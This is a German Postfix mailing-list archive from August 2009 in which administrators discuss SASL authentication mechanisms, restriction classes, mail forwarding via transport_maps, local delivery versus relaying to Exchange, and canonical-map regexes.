2009 From: cite+postfix-buch at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Tue, 18 Aug 2009 10:52:36 +0200 Subject: [Postfixbuch-users] einheitliche Bounces In-Reply-To: References: Message-ID: <20090818085235.GZ31881@mail.incertum.net> * Leo Unglaub : [Bounces] > Daher wollte ich fragen wie da die genaue Situation ist. Sind die > Bounce Mails in einem RFC strikt definiert oder sind das eher > Vorgaben die aber nicht pflicht sind? Bounce-Mitteilungen sind nirgendwo standardisiert. Wenn Du Beispielcode zum automatischen Parsen brauchst: Mailman (http://www.list.org/) bietet jede Menge Beispiele dafür, wie man die automatisch auswertet, sowohl der Source als auch die Templates sind eine durchaus interessante, stellenweise gar erheiternde Lektüre. > Ich frage weil ich ernsthaft überlege diese Domains bei RFC-Ignorant > zu melden, da auf Abuse und co auch niemand antwortet. Das ist natürlich was ganz anderes. Und ernsthaft: Meistens ist es die Mühe nicht wert. Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 25 Zeichen, daß Du erwachsen bist, Nummer 23: 90% der Zeit, die Du vor dem Computer verbringst, ist für Deine Arbeit. From hans.moser at ofd-sth.niedersachsen.de Tue Aug 18 11:54:26 2009 From: hans.moser at ofd-sth.niedersachsen.de (Marc Patermann) Date: Tue, 18 Aug 2009 11:54:26 +0200 Subject: [Postfixbuch-users] Erweitertes Authentifizierungsverfahren nutzen "CRAM-MD5" In-Reply-To: References: Message-ID: <4A8A7A52.7040900@ofd-sth.niedersachsen.de> Hallo! Maik Brauer schrieb: > Wer kann mit sagen was ich falsch gemacht habe, bzw wie ich CRAM-MD5 mit > MYSQL ans laufen kriege. Nur noch mal für Protokoll: saslauthd unterstützt keine Shared Secret-Mechanismen wie CRAM-MD5. "IMPORTANT: The Cyrus SASL password verification services pwcheck and saslauthd can only support the plaintext mechanisms PLAIN or LOGIN." -> http://www.postfix.org/SASL_README.html Marc From mailinglist at mbs-technet.com Tue Aug 18 11:59:05 2009 From: mailinglist at mbs-technet.com (Maik Brauer) Date: Tue, 18 Aug 2009 11:59:05 +0200 Subject: [Postfixbuch-users] Erweitertes Authentifizierungsverfahren nutzen "CRAM-MD5" In-Reply-To: <4A8A7A52.7040900@ofd-sth.niedersachsen.de> References: <4A8A7A52.7040900@ofd-sth.niedersachsen.de> Message-ID: Hi Marc, ist aber irgendwie komisch. Habe es jetzt mit PLAIN, LOGIN und CRAM-MD5 am laufen. Klappt wunderbar mit saslauthd ;-) Gruss, Maik On Aug 18, 2009, at 11:54 AM, Marc Patermann wrote: > Hallo! > > Maik Brauer schrieb: > >> Wer kann mit sagen was ich falsch gemacht habe, bzw wie ich CRAM- >> MD5 mit MYSQL ans laufen kriege. > Nur noch mal für Protokoll: saslauthd unterstützt keine Shared > Secret-Mechanismen wie CRAM-MD5. > > "IMPORTANT: The Cyrus SASL password verification services pwcheck > and saslauthd can only support the plaintext mechanisms PLAIN or > LOGIN." > -> http://www.postfix.org/SASL_README.html > > > Marc > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listen.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users From hans.moser at ofd-sth.niedersachsen.de Tue Aug 18 12:07:59 2009 From: hans.moser at ofd-sth.niedersachsen.de (Marc Patermann) Date: Tue, 18 Aug 2009 12:07:59 +0200 Subject: [Postfixbuch-users] Erweitertes Authentifizierungsverfahren nutzen "CRAM-MD5" In-Reply-To: References: <4A8A7A52.7040900@ofd-sth.niedersachsen.de> Message-ID: <4A8A7D7F.6090105@ofd-sth.niedersachsen.de> Maik Brauer schrieb: >>> Wer kann mit sagen was ich falsch gemacht habe, bzw wie ich CRAM-MD5 >>> mit MYSQL ans laufen kriege. >> Nur noch mal für Protokoll: saslauthd unterstützt keine Shared >> Secret-Mechanismen wie CRAM-MD5. >> >> "IMPORTANT: The Cyrus SASL password verification services pwcheck and >> saslauthd can only support the plaintext mechanisms PLAIN or LOGIN." >> -> http://www.postfix.org/SASL_README.html > ist aber irgendwie komisch. > Habe es jetzt mit PLAIN, LOGIN und CRAM-MD5 am laufen. Klappt wunderbar > mit saslauthd ;-) Wenn das deine Konfiguration ist, verwendest du jetzt das auxprop Plugin SQL und nicht saslauthd: pwcheck_method: auxprop mech_list: PLAIN LOGIN CRAM-MD5 DIGEST-MD5 auxprop-plugin: sql sql_engine: mysql Marc From p at state-of-mind.de Tue Aug 18 12:01:53 2009 From: p at state-of-mind.de (Patrick Ben Koetter) Date: Tue, 18 Aug 2009 12:01:53 +0200 Subject: [Postfixbuch-users] Erweitertes Authentifizierungsverfahren nutzen "CRAM-MD5" In-Reply-To: References: <4A8A7A52.7040900@ofd-sth.niedersachsen.de> Message-ID: <20090818100153.GE1638@state-of-mind.de> * Maik Brauer : > Hi Marc, > > ist aber irgendwie komisch. > Habe es jetzt mit PLAIN, LOGIN und CRAM-MD5 am laufen. Klappt wunderbar > mit saslauthd ;-) Das ist falsch. Es klappt mit Sicherheit nicht und Du hast bisher einfach falsch oder nicht getestet. Schnapp die gen-auth von John Jetmoore. Mach einen telnet auf Deinen Server, wähle CRAM-MD5 und teste. Ich bin mir sehr sicher, dass es nicht "wunderbar mit saslauthd" klappt. p at rick > > Gruss, > Maik > > > On Aug 18, 2009, at 11:54 AM, Marc Patermann wrote: > >> Hallo! >> >> Maik Brauer schrieb: >> >>> Wer kann mit sagen was ich falsch gemacht habe, bzw wie ich CRAM-MD5 >>> mit MYSQL ans laufen kriege. >> Nur noch mal für Protokoll: saslauthd unterstützt keine Shared >> Secret-Mechanismen wie CRAM-MD5. >> >> "IMPORTANT: The Cyrus SASL password verification services pwcheck and >> saslauthd can only support the plaintext mechanisms PLAIN or LOGIN." >> -> http://www.postfix.org/SASL_README.html >> >> >> Marc >> -- >> _______________________________________________ >> Postfixbuch-users -- http://www.postfixbuch.de >> Heinlein Professional Linux Support GmbH >> >> Postfixbuch-users at listen.jpberlin.de >> https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users > > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listen.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users From sk at kueppers-online.de Tue Aug 18 12:26:30 2009 From: sk at kueppers-online.de (=?ISO-8859-15?Q?Stefan_K=FCppers?=) Date: Tue, 18 Aug 2009 12:26:30 +0200 Subject: [Postfixbuch-users] mails nur innerhalb der senderdomain zulassen Message-ID: <4A8A81D6.20906@kueppers-online.de> Hallo zusammen, hat jemand eine Idee, wie ich für bestimmte sender, Mailadressen eines Kopieres, festlegen kann, dass nur Mails innerhalb der senderdomain verschickt werden dürfen. Der Hintergrund ist, dass von dem Kopierer nichts in die "weite Welt" verschickt werden soll. So in der Art: kopierer01 at domain.xyz -> user at domain.xyz OK kopierer01 at domain.xyz -> user at domain.abc REJECT Viele Grüße Stefan From driessen at fblan.de Tue Aug 18 12:47:49 2009 From: driessen at fblan.de (Uwe Driessen) Date: Tue, 18 Aug 2009 12:47:49 +0200 Subject: [Postfixbuch-users] mails nur innerhalb der senderdomain zulassen In-Reply-To: <4A8A81D6.20906@kueppers-online.de> References: <4A8A81D6.20906@kueppers-online.de> Message-ID: <000c01ca1ff1$5471e450$0565a8c0@uwe> On Behalf Of Stefan Küppers > Hallo zusammen, > > hat jemand eine Idee, wie ich für bestimmte sender, Mailadressen eines > Kopieres, festlegen kann, dass nur Mails innerhalb der senderdomain > verschickt werden dürfen. Der Hintergrund ist, dass von dem Kopierer > nichts in die "weite Welt" verschickt werden soll. > > So in der Art: > > kopierer01 at domain.xyz -> user at domain.xyz OK > kopierer01 at domain.xyz -> user at domain.abc REJECT Mit Restrition class smtpd_recipient_restrictions = ..... Check_senderaccess hash:kopierer :kopierer kopierer01 at domain.xyz kopierer smtpd_restriction_classes = kopierer kopierer = check_recipient_access pcre:erlaubtfuerkopierer :erlaubtfuerkopierer /user at domain\.xyz$/ OK /*/ REJECT > > Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: +49 06708 / 660045 Fax: +49 06708 / 661397 From cite+postfix-buch at incertum.net Tue Aug 18 12:45:07 2009 From: cite+postfix-buch at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Tue, 18 Aug 2009 12:45:07 +0200 Subject: [Postfixbuch-users] mails nur innerhalb der senderdomain zulassen In-Reply-To: <4A8A81D6.20906@kueppers-online.de> References: <4A8A81D6.20906@kueppers-online.de> Message-ID: <20090818104507.GA17045@mail.incertum.net> * Stefan Küppers : > hat jemand eine Idee, wie ich für bestimmte sender, Mailadressen eines > Kopieres, festlegen kann, dass nur Mails innerhalb der senderdomain > verschickt werden dürfen. Der Hintergrund ist, dass von dem Kopierer > nichts in die "weite Welt" verschickt werden soll. http://www.postfix.org/RESTRICTION_CLASS_README.html Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 "THERE'S NO JUSTICE, THERE'S JUST ME" - Death aus Terry Pratchett's 'Mort' From sk at kueppers-online.de Tue Aug 18 13:27:16 2009 From: sk at kueppers-online.de (=?ISO-8859-1?Q?Stefan_K=FCppers?=) Date: Tue, 18 Aug 2009 13:27:16 +0200 Subject: [Postfixbuch-users] mails nur innerhalb der senderdomain zulassen In-Reply-To: <000c01ca1ff1$5471e450$0565a8c0@uwe> References: <4A8A81D6.20906@kueppers-online.de> <000c01ca1ff1$5471e450$0565a8c0@uwe> Message-ID: <4A8A9014.7010405@kueppers-online.de> Uwe Driessen schrieb: > On Behalf Of Stefan Küppers > >> Hallo zusammen, >> >> hat jemand eine Idee, wie ich für bestimmte sender, Mailadressen eines >> Kopieres, festlegen kann, dass nur Mails innerhalb der senderdomain >> verschickt werden dürfen. Der Hintergrund ist, dass von dem Kopierer >> nichts in die "weite Welt" verschickt werden soll. >> >> So in der Art: >> >> kopierer01 at domain.xyz -> user at domain.xyz OK >> kopierer01 at domain.xyz -> user at domain.abc REJECT >> > > Mit Restrition class > > smtpd_recipient_restrictions = ..... > Check_senderaccess hash:kopierer > > :kopierer > > kopierer01 at domain.xyz kopierer > > > > smtpd_restriction_classes = > kopierer > > kopierer = check_recipient_access pcre:erlaubtfuerkopierer > > > :erlaubtfuerkopierer > > /user at domain\.xyz$/ OK > /*/ REJECT > > > >> > > > Mit freundlichen Grüßen > > Drießen > > Hallo Uwe, vielen Dank für die schnelle und ausführliche Antwort. Ich werd's mal so einbauen. Viele Grüße Stefan From driessen at fblan.de Tue Aug 18 14:32:54 2009 From: driessen at fblan.de (Uwe Driessen) Date: Tue, 18 Aug 2009 14:32:54 +0200 Subject: [Postfixbuch-users] mails nur innerhalb dersenderdomain zulassen In-Reply-To: <4A8A9014.7010405@kueppers-online.de> References: <4A8A81D6.20906@kueppers-online.de><000c01ca1ff1$5471e450$0565a8c0@uwe> <4A8A9014.7010405@kueppers-online.de> Message-ID: <001001ca2000$027fcfe0$0565a8c0@uwe> On Behalf Of Stefan Küppers > Hallo Uwe, > > vielen Dank für die schnelle und ausführliche Antwort. > Ich werd's mal so einbauen. > > Viele Grüße > Stefan Hallo Stefan vergiss nicht das erstmal zu prüfen ich hab das nur mal so einfach schnell runtergeschrieben. Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: +49 06708 / 660045 Fax: +49 06708 / 661397 From jk at jkart.de Tue Aug 18 14:24:03 2009 From: jk at jkart.de (Jim Knuth) Date: Tue, 18 Aug 2009 14:24:03 +0200 Subject: [Postfixbuch-users] Mails generell umleiten Message-ID: <4A8A9D63.1020604@jkart.de> Hallo, ich hab hier ein "Problem" zu lösen. Es gibt auf einem Server (Server A) einen User (Kunde X) der hat z. B. 5 Postfächer mit je 10 E-Mail Adressen. Auf dem Server läuft Postfix. Nun hatte der Kunde die Idee, sich einen eigenen Mailserver (Server B) zuzulegen. Jetzt sollen ALLE E-Mails, die an Kunde X auf Server A gehen, bei Kunde X auf Server B ankommen. Wie kann man das möglichst elegant; und für später; und wartungsfrei lösen? Wartungsfrei heisst in diesem Falle dass Kundex X auf Server A auch gern noch E-Mail Accounts, bzw. E-Mail Adressen anlegen darf und die Weiterleitung trotzdem funktioniert. Danke fürs Antworten und hoffentlich habe ich mich klar genug ausgedrückt. ;) -- mit freundlichem Gruss - with kind regard Jim Knuth From sk at kueppers-online.de Tue Aug 18 14:53:01 2009 From: sk at kueppers-online.de (=?ISO-8859-1?Q?Stefan_K=FCppers?=) Date: Tue, 18 Aug 2009 14:53:01 +0200 Subject: [Postfixbuch-users] mails nur innerhalb dersenderdomain zulassen In-Reply-To: <001001ca2000$027fcfe0$0565a8c0@uwe> References: <4A8A81D6.20906@kueppers-online.de><000c01ca1ff1$5471e450$0565a8c0@uwe> <4A8A9014.7010405@kueppers-online.de> <001001ca2000$027fcfe0$0565a8c0@uwe> Message-ID: <4A8AA42D.80404@kueppers-online.de> Uwe Driessen schrieb: > On Behalf Of Stefan Küppers > >> Hallo Uwe, >> >> vielen Dank für die schnelle und ausführliche Antwort. >> Ich werd's mal so einbauen. >> >> Viele Grüße >> Stefan >> > > Hallo Stefan > vergiss nicht das erstmal zu prüfen ich hab das nur mal so einfach schnell > runtergeschrieben. > > > Mit freundlichen Grüßen > > Drießen > > Hallo Uwe, nee, das kommt jetzt so per Copy & Paste ins Produktivsystem. Danach mache ich Feierabend für heute und lasse mich morgen, nachdem unser Ticketsystem durchgeglüht ist vor's Problemmanagementboard zitieren um direkt im Anschluß drei Etagen drüber meine Papiere in Empfang zu nehmen. - Ok, war nur so eine kleine Admin-Allmachts-Träumerei - natürlich werde ich das vorher auf einem Testsystem prüfen, auch wenn die Lösung auf den ersten Blick schon sehr überzeugend aussah. Viele Grüße Stefan From cite+postfix-buch at incertum.net Tue Aug 18 14:58:53 2009 From: cite+postfix-buch at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Tue, 18 Aug 2009 14:58:53 +0200 Subject: [Postfixbuch-users] Mails generell umleiten In-Reply-To: <4A8A9D63.1020604@jkart.de> References: <4A8A9D63.1020604@jkart.de> Message-ID: <20090818125853.GB17045@mail.incertum.net> * Jim Knuth : > ich hab hier ein "Problem" zu lösen. > Es gibt auf einem Server (Server A) einen User (Kunde X) der hat z. B. 5 > Postfächer mit je 10 E-Mail Adressen. Auf dem Server läuft Postfix. > Nun hatte der Kunde die Idee, sich einen eigenen Mailserver (Server B) > zuzulegen. Jetzt sollen ALLE E-Mails, die an Kunde X auf Server A gehen, > bei Kunde X auf Server B ankommen. Wie kann man das möglichst elegant; > und für später; und wartungsfrei lösen? Wartungsfrei heisst in diesem > Falle dass Kundex X auf Server A auch gern noch E-Mail Accounts, bzw. > E-Mail Adressen anlegen darf und die Weiterleitung trotzdem funktioniert. Bieg den MX-Eintrag um. Ansonsten sagt meine Glaskugel: http://www.postfix.org/postconf.5.html#recipient_bcc_maps http://www.postfix.org/postconf.5.html#virtual_alias_maps http://freshmeat.net/projects/imapsync/ > hoffentlich habe ich mich klar genug ausgedrückt. ;) Nicht wirklich. Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 FdI #148: Flame - Flames sind der dumpfe Knall, wenn die Schädeldecke auf die Mauer aufschlägt. (Frank Hufschmied) From jan at chef-ist.net Tue Aug 18 15:08:53 2009 From: jan at chef-ist.net (=?ISO-8859-1?Q?Jan_Kr=FCger?=) Date: Tue, 18 Aug 2009 15:08:53 +0200 Subject: [Postfixbuch-users] Mails generell umleiten In-Reply-To: <20090818125853.GB17045@mail.incertum.net> References: <4A8A9D63.1020604@jkart.de> <20090818125853.GB17045@mail.incertum.net> Message-ID: <4A8AA7E5.3070800@chef-ist.net> Hallo Jim, > Jetzt sollen ALLE E-Mails, die an Kunde X auf Server A gehen, > bei Kunde X auf Server B ankommen. Wie kann man das möglichst elegant; > und für später; und wartungsfrei lösen? Wartungsfrei heisst in diesem > Falle dass Kundex X auf Server A auch gern noch E-Mail Accounts, bzw. > E-Mail Adressen anlegen darf und die Weiterleitung trotzdem funktioniert. Transport_maps und dann so ala domain.de smtp:[] schau aber lieber nochmal bei http://www.postfix.org/transport.5.html vorbei. Gruß Jan From mailinglist at mbs-technet.com Tue Aug 18 15:15:47 2009 From: mailinglist at mbs-technet.com (Maik Brauer) Date: Tue, 18 Aug 2009 15:15:47 +0200 Subject: [Postfixbuch-users] Erweitertes Authentifizierungsverfahren nutzen "CRAM-MD5" In-Reply-To: <20090818100153.GE1638@state-of-mind.de> References: <4A8A7A52.7040900@ofd-sth.niedersachsen.de> <20090818100153.GE1638@state-of-mind.de> Message-ID: Hi @ll, das ist ein Auszug aus dem smtpd.log: pwcheck_method: auxprop mech_list: PLAIN LOGIN CRAM-MD5 DIGEST-MD5 auxprop-plugin: sql sql_engine: mysql Dann habt Ihr natürlich Recht. Ja ich nutze das saslauthd. Danke für die Denkanstösse. Grüsse, Maik On Aug 18, 2009, at 12:01 PM, Patrick Ben Koetter wrote: > * Maik Brauer : >> Hi Marc, >> >> ist aber irgendwie komisch. >> Habe es jetzt mit PLAIN, LOGIN und CRAM-MD5 am laufen. Klappt >> wunderbar >> mit saslauthd ;-) > > Das ist falsch. Es klappt mit Sicherheit nicht und Du hast bisher > einfach > falsch oder nicht getestet. > > Schnapp die gen-auth von John Jetmoore. Mach einen telnet auf Deinen > Server, > wähle CRAM-MD5 und teste. > > Ich bin mir sehr sicher, dass es nicht "wunderbar mit saslauthd" > klappt. > > p at rick > > > >> >> Gruss, >> Maik >> >> >> On Aug 18, 2009, at 11:54 AM, Marc Patermann wrote: >> >>> Hallo! >>> >>> Maik Brauer schrieb: >>> >>>> Wer kann mit sagen was ich falsch gemacht habe, bzw wie ich CRAM- >>>> MD5 >>>> mit MYSQL ans laufen kriege. >>> Nur noch mal für Protokoll: saslauthd unterstützt keine Shared >>> Secret-Mechanismen wie CRAM-MD5. >>> >>> "IMPORTANT: The Cyrus SASL password verification services pwcheck >>> and >>> saslauthd can only support the plaintext mechanisms PLAIN or LOGIN." >>> -> http://www.postfix.org/SASL_README.html >>> >>> >>> Marc >>> -- >>> _______________________________________________ >>> Postfixbuch-users -- http://www.postfixbuch.de >>> Heinlein Professional Linux Support GmbH >>> >>> Postfixbuch-users at listen.jpberlin.de >>> https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users >> >> -- >> _______________________________________________ >> Postfixbuch-users -- http://www.postfixbuch.de >> Heinlein Professional Linux Support GmbH >> >> Postfixbuch-users at listen.jpberlin.de >> https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listen.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From werner at aloah-from-hell.de Tue Aug 18 16:10:24 2009 From: werner at aloah-from-hell.de (Werner Detter) Date: Tue, 18 Aug 2009 16:10:24 +0200 Subject: [Postfixbuch-users] Mails generell umleiten In-Reply-To: <4A8A9D63.1020604@jkart.de> References: <4A8A9D63.1020604@jkart.de> Message-ID: <4A8AB650.7010300@aloah-from-hell.de> Jim Knuth schrieb: > Hallo, > > ich hab hier ein "Problem" zu lösen. > Es gibt auf einem Server (Server A) einen User (Kunde X) der hat z. B. 5 > Postfächer mit je 10 E-Mail Adressen. Auf dem Server läuft Postfix. > Nun hatte der Kunde die Idee, sich einen eigenen Mailserver (Server B) > zuzulegen. Jetzt sollen ALLE E-Mails, die an Kunde X auf Server A gehen, > bei Kunde X auf Server B ankommen. Wie kann man das möglichst elegant; > und für später; und wartungsfrei lösen? Wartungsfrei heisst in diesem > Falle dass Kundex X auf Server A auch gern noch E-Mail Accounts, bzw. > E-Mail Adressen anlegen darf und die Weiterleitung trotzdem > funktioniert. Danke fürs Antworten und hoffentlich habe ich mich klar > genug ausgedrückt. ;) > http://www.postfix.org/postconf.5.html#transport_maps From kai_postfix at fuerstenberg.ws Tue Aug 18 16:38:16 2009 From: kai_postfix at fuerstenberg.ws (=?ISO-8859-1?Q?Kai_F=FCrstenberg?=) Date: Tue, 18 Aug 2009 16:38:16 +0200 Subject: [Postfixbuch-users] Mails generell umleiten In-Reply-To: <4A8A9D63.1020604@jkart.de> References: <4A8A9D63.1020604@jkart.de> Message-ID: <4A8ABCD8.2090109@fuerstenberg.ws> Hi Jim, Jim Knuth schrieb am 18.08.2009 14:24: > ich hab hier ein "Problem" zu lösen. > Es gibt auf einem Server (Server A) einen User (Kunde X) der hat z. B. > 5 Postfächer mit je 10 E-Mail Adressen. Auf dem Server läuft Postfix. > Nun hatte der Kunde die Idee, sich einen eigenen Mailserver (Server B) > zuzulegen. Jetzt sollen ALLE E-Mails, die an Kunde X auf Server A > gehen, bei Kunde X auf Server B ankommen. Wie kann man das möglichst > elegant; und für später; und wartungsfrei lösen? Wartungsfrei heisst > in diesem Falle dass Kundex X auf Server A auch gern noch E-Mail > Accounts, bzw. E-Mail Adressen anlegen darf und die Weiterleitung > trotzdem funktioniert. Danke fürs Antworten und hoffentlich habe ich > mich klar genug ausgedrückt. ;) zu den bisher schon genannten würde ich mir vielleicht noch relay_domains http://www.postfix.org/postconf.5.html#relay_domains ansehen. -- Kai Fürstenberg PM an: kai at fuerstenberg punkt ws From hans.moser at ofd-sth.niedersachsen.de Tue Aug 18 17:01:37 2009 From: hans.moser at ofd-sth.niedersachsen.de (Marc Patermann) Date: Tue, 18 Aug 2009 17:01:37 +0200 Subject: [Postfixbuch-users] Erweitertes Authentifizierungsverfahren nutzen "CRAM-MD5" In-Reply-To: References: <4A8A7A52.7040900@ofd-sth.niedersachsen.de> <20090818100153.GE1638@state-of-mind.de> Message-ID: <4A8AC251.5000300@ofd-sth.niedersachsen.de> Maik Brauer schrieb: > *pwcheck_method: auxprop* > *auxprop-plugin: sql* > Dann habt Ihr natürlich Recht. Ja ich nutze das saslauthd. Eben genau nicht saslauthd! Marc From werner at aloah-from-hell.de Tue Aug 18 17:11:39 2009 From: werner at aloah-from-hell.de (Werner Detter) Date: Tue, 18 Aug 2009 17:11:39 +0200 Subject: [Postfixbuch-users] Erweitertes Authentifizierungsverfahren nutzen "CRAM-MD5" In-Reply-To: <4A8AC251.5000300@ofd-sth.niedersachsen.de> References: <4A8A7A52.7040900@ofd-sth.niedersachsen.de> <20090818100153.GE1638@state-of-mind.de> <4A8AC251.5000300@ofd-sth.niedersachsen.de> Message-ID: <4A8AC4AB.7060507@aloah-from-hell.de> Ja, er hat auxprop und nicht saslauthd .... Werner From mailinglist at mbs-technet.com Tue Aug 18 17:15:00 2009 From: mailinglist at mbs-technet.com (Maik Brauer) Date: Tue, 18 Aug 2009 17:15:00 +0200 Subject: [Postfixbuch-users] Erweitertes Authentifizierungsverfahren nutzen "CRAM-MD5" In-Reply-To: <4A8AC4AB.7060507@aloah-from-hell.de> References: <4A8A7A52.7040900@ofd-sth.niedersachsen.de> <20090818100153.GE1638@state-of-mind.de> <4A8AC251.5000300@ofd-sth.niedersachsen.de> <4A8AC4AB.7060507@aloah-from-hell.de> Message-ID: Sorry ! Schreibfehler. Ich habe "NICHT" das saslauthd ! Grüsse, Maik On Aug 18, 2009, at 5:11 PM, Werner Detter wrote: > > Ja, er hat auxprop und nicht saslauthd .... > > Werner > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listen.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users From jk at jkart.de Tue Aug 18 18:14:18 2009 From: jk at jkart.de (Jim Knuth) Date: Tue, 18 Aug 2009 18:14:18 +0200 Subject: [Postfixbuch-users] Mails generell umleiten In-Reply-To: <4A8AA7E5.3070800@chef-ist.net> References: <4A8A9D63.1020604@jkart.de> <20090818125853.GB17045@mail.incertum.net> <4A8AA7E5.3070800@chef-ist.net> Message-ID: <4A8AD35A.4060400@jkart.de> am 18.08.2009 15:08 Uhr schrieb Jan Krüger : > Hallo Jim, > >> Jetzt sollen ALLE E-Mails, die an Kunde X auf Server A gehen, >> bei Kunde X auf Server B ankommen. Wie kann man das möglichst elegant; >> und für später; und wartungsfrei lösen? Wartungsfrei heisst in diesem >> Falle dass Kundex X auf Server A auch gern noch E-Mail Accounts, bzw. >> E-Mail Adressen anlegen darf und die Weiterleitung trotzdem funktioniert. > Transport_maps ich hab jetzt in der main.cf eingetragen transport_maps = hash:/etc/postfix/transport Ja, postmap hab ich gemacht und Postfix reloaded ;) > und dann so ala > domain.de smtp:[] und in transport .domain.de lmtp:[mail-domain.de] Seitdem sehe ich nix mehr im Log bezüglich der Domain!? > Gruß > Jan -- mit freundlichem Gruss - with kind regard Jim Knuth From Andreas.Schuett at awn.de Wed Aug 19 08:02:15 2009 From: Andreas.Schuett at awn.de (=?iso-8859-1?Q?Andreas_Sch=FCtt?=) Date: Wed, 19 Aug 2009 08:02:15 +0200 Subject: [Postfixbuch-users] Lokale Zustellung und Relay zum ExchangeServer Message-ID: <739F5A122317DA4DADA7C1A4B7A7CCCF8E30C3@awn2000exv.awn2000.local> Moin, moin Liste, wahrscheinlich sehe ich den Wald vor lauter Bäumen nicht oder ich habe da noch Wissenbedarf.:) Unsere lokale Zustellung wurde vor etlichen Monaten (gute 2 Jahre) auf Relay zum ExchangeServer umgestellt. Dies funktioniert auch perfekt. Jetz stellt sich die Anforderung, mails zu einer neuen domain (abc24.com) sollen wieder "lokal" zugestellt werden. Die Domain aus der "transport"-table entfernt und zum Test einen Benutzer in der Tabelle "virtualUsers" angelegt, mydestination um diese Domain (abc24.com) ergänzt und einen "reload" durchgeführt. Für diesen User existiert schon ein Cyrus-IMAP Eintrag. Schicke ich jetzt eine Mail an diesen User, wird die Domain umgeschrieben (abcdef.de) und landet letztendlich auf dem ExchangeServer!? postconf -n alias_database = hash:/etc/aliases alias_maps = hash:/etc/aliases append_dot_mydomain = no biff = no body_checks = regexp:/etc/postfix/body_checks config_directory = /etc/postfix content_filter = smtp-amavis:[127.0.0.1]:10024 default_destination_concurrency_limit = 5 delay_warning_time = 4h header_checks = regexp:/etc/postfix/header_checks inet_interfaces = all local_recipient_maps = local_transport = cyrus: mailbox_command = procmail -a "$EXTENSION" mailbox_size_limit = 0 maximal_queue_lifetime = 5d mydestination = abc24.com , localhost myhostname = abcmail.abcdef.de mynetworks = 127.0.0.0/8,172.20.0.0/16 myorigin = /etc/mailname queue_run_delay = 1800s recipient_delimiter = + relay_domains = hash:/etc/postfix/relayDomain relay_recipient_maps = hash:/etc/postfix/relay_recipients relayhost = smtpd_banner = $myhostname ESMTP $mail_name (Debian/GNU) smtpd_recipient_restrictions = reject_unlisted_recipient, permit_mynetworks, reject_unauth_destination, reject_non_fqdn_sender, check_policy_service inet:127.0.0.1:60000 transport_maps = hash:/etc/postfix/transport Warum sehe ich hier (postconf -n) eigentlich nicht den Eintrag "virtual_maps = hash:/etc/postfix/virtualUsers" ??? Transport: abc.de smtp:172.20.100.61 abcdef.de smtp:172.20.100.61 abc24.de smtp:172.20.100.61 virtualUsers: # Benutzerkonten andreas.schuett at abc24.com andreas.schuett Wie kann ich postfix davon überzeugen, mails für diese eine Domain wieder lokal zu zustellen? Vielen Dank für schonmal im voraus. Andreas -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From bud-fox at gmx.de Wed Aug 19 11:55:22 2009 From: bud-fox at gmx.de (Matthias) Date: Wed, 19 Aug 2009 11:55:22 +0200 Subject: [Postfixbuch-users] Lokale Zustellung und Relay zum ExchangeServer In-Reply-To: <739F5A122317DA4DADA7C1A4B7A7CCCF8E30C3@awn2000exv.awn2000.local> Message-ID: <000a01ca20b3$2b5eac20$0601a8c0@emnpc2> Andreas Schütt schrieb am Mittwoch, den 19. August 2009: > Warum sehe ich hier (postconf -n) eigentlich nicht den Eintrag "virtual_maps = hash:/etc/postfix/virtualUsers" ??? K.A. Aber das hat eh 'nen Bart: [...virtual_maps (default: empty) Optional lookup tables with a) names of domains for which all addresses are aliased to addresses in other local or remote domains, and b) addresses that are aliased to addresses in other local or remote domains. Available before Postfix version 2.0. With Postfix version 2.0 and later, this is replaced by separate controls: virtual_alias_domains and virtual_alias_maps...] > Wie kann ich postfix davon überzeugen, mails für diese eine Domain wieder lokal zu zustellen? Ich würde das ganze Gewerk (und speziell das Thema "virtual") auf einen aktuellen Stand bringen, dann funktioniert das i.d.R problemlos ;-) Gruß Matthias From markus.meyer at koeln.de Thu Aug 20 13:02:07 2009 From: markus.meyer at koeln.de (Markus Meyer) Date: Thu, 20 Aug 2009 13:02:07 +0200 Subject: [Postfixbuch-users] =?iso-8859-15?q?Trennzeichen_f=FCr_Canonical_?= =?iso-8859-15?q?Maps_gesucht?= Message-ID: <4A8D2D2F.2060703@koeln.de> Aloha liebe Leute, ich möchte aus unserer Web-Applikation einen String vor jede E-Mail Adresse anhängen, welcher dann auf den Mailservern via PCRE-Canonical Maps raus gefiltert werden soll. Soll dann so im mail.log stehen: to=, orig_to=<9in38--iasimov at beispiel.de> Der String setzt sich wie folgt zusammen: /[:alnum:]{1,8}/ D.h. in der Canonical Map steht dann: /^([[:alnum:]]{1,8}--)(.*)/ $2 Hier habe ich '--' als Trenner benutzt. Aber ich denke das dies nicht die beste Wahl ist. Wollte mal fragen, was man hier am Besten nehmen sollte? Kann vielleicht jemand abschätzen wie sich das auf die Performance bei etwa 20k E-Mails pro Stunde auswirkt? Vielleicht sind ja Regexp-Tabellen sogar schneller? Gruß 